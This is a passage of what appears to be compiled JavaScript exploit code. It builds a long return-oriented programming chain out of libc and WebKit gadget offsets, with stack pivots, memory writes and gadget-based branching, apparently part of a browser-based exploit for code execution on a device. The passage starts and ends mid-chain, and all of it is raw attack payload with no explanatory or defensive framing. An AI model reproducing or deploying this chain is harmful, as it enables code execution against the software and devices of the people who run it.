webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6849:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6850:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6851:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+340152, //L6853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6852:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6853:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+340208, //L6854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6854:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6856:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+340288, //L6858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6858:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+340384, //L6860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6859:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6860:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6861:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+340464, //L6862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6862:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6864:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+340544, //L6865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6865:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6690:
libc_base+764760, //pop rsi
ropchain+340608, //L6867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6867:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6869:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+340728, //L6872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+340712, //L6870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6870:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6872:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+340904, //L6875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+340920, //L6876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+340872, //L6873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+340888, //L6874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6873:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6874:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6875:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6876:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+341016, //L6878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+341000, //L6877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6877:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6878:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6879:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6880:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L6881:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+341216, //L6883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6883:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+341272, //L6884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6884:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+341408, //L6888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+341392, //L6887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6886:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6887:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6888:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+341472, //L6889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6889:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6891:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6893:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+341632, //L6896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+341616, //L6894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6894:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6896:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+341776, //L6899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+341744, //L6897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+341760, //L6898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6897:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6898:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6899:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+341864, //L6901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6900:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6901:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+341920, //L6902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6902:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6904:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+342000, //L6906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6906:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+342096, //L6908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6907:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6908:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6909:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+342176, //L6910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6910:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6912:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+342256, //L6913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6913:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6720:
libc_base+764760, //pop rsi
ropchain+342320, //L6915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6915:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6917:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+342440, //L6920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+342424, //L6918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6918:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6920:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+342616, //L6923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+342632, //L6924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+342584, //L6921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+342600, //L6922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6921:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6923:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6924:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+342728, //L6926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+342712, //L6925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6925:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6926:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6927:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6928:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L6929:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+342928, //L6931
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6931:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+342984, //L6932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6932:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+343120, //L6936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+343104, //L6935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6934:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6935:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6936:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+343184, //L6937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6937:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6939:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6941:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+343344, //L6944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+343328, //L6942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6942:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+343488, //L6947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+343456, //L6945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+343472, //L6946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6945:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6946:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+343576, //L6949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6948:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+343632, //L6950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6950:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6952:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+343712, //L6954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6954:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+343808, //L6956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6955:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6956:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6957:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+343888, //L6958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6958:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6960:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+343968, //L6961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6961:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6721:
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+344048, //L6964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6963:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6964:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+344128, //L6966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6968:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+344208, //L6969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6969:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6768:
libc_base+764760, //pop rsi
ropchain+344272, //L6971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6971:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6973:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+344392, //L6976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+344376, //L6974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6974:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6976:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+344568, //L6979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+344584, //L6980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+344536, //L6977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+344552, //L6978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6977:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6978:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6980:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+344744, //L6984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+344712, //L6982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+344728, //L6983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6981:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6982:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6983:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6984:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+344880, //L6987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+344912, //L6989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+344864, //L6986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6986:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6987:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6989:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+345024, //L6990+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+345016, //L6990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6990:
db([0, 0]); // 0x0
set_gadgets([
ropchain+345040, //L6990+24
ropchain+345056, //L6985
libc_base+782311, //pop rsp
ropchain+327440, //L6528
//L6985:
//L6991:
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+345112, //L6993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6992:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6993:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6994:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+345192, //L6995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6995:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6997:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6999:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+345352, //L7002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+345336, //L7000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7000:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7002:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+345432, //L7003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+345448, //L7004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7003:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7004:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+345608, //L7008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+345576, //L7006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+345592, //L7007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7005:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7006:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7007:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7008:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+345664, //L7010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7010:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+345792, //L7012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+345808, //L7013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+345776, //L7011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7011:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7012:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7013:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+345968, //L7017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+345936, //L7015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+345952, //L7016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7014:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7015:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7016:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7017:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
